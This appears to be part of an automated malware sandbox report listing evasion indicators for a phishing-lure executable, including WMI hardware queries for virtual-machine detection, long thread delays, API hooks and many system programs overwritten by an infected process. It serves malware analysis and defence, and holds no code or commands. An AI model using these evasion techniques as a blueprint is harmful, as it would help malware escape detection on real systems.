Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	Code function: 10_2_009952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]		10_2_009952A0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 15_2_022552A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]		15_2_022552A0
Source: C:\Windows\System32\FXSSVC.exe	Code function: 39_2_00D252A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]		39_2_00D252A0

Source: C:\Users\user\AppData\Local\Temp\build.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	API/Special instruction interceptor: Address: A4D8BC
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	API/Special instruction interceptor: Address: C092A4

Source: C:\Users\user\AppData\Local\Temp\build.exe	Memory allocated: D40000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Memory allocated: 2A40000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Memory allocated: 4A40000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Memory allocated: 1060000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Memory allocated: 1AF00000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: D40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 1AD20000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 1170000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 1AD60000 memory reserve | memory write watch

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Users\user\AppData\Local\Temp\build.exe	Window / User API: threadDelayed 1404			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Window / User API: threadDelayed 1168			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Window / User API: threadDelayed 2359
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Window / User API: threadDelayed 7442
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5902
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3874
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5669
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4093
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7679
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7603
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2059

Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\msedgewebview2.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\BHO\ie_to_edge_stub.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\msedgewebview2.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\msedge_pwa_launcher.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe			Jump to dropped file
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Dropped PE file which has not been started: C:\Windows\System32\AppVClient.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\msedge_proxy.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\msedge_proxy.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\notification_click_helper.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	Dropped PE file which has not been started: C:\Windows\System32\msdtc.exe			Jump to dropped file
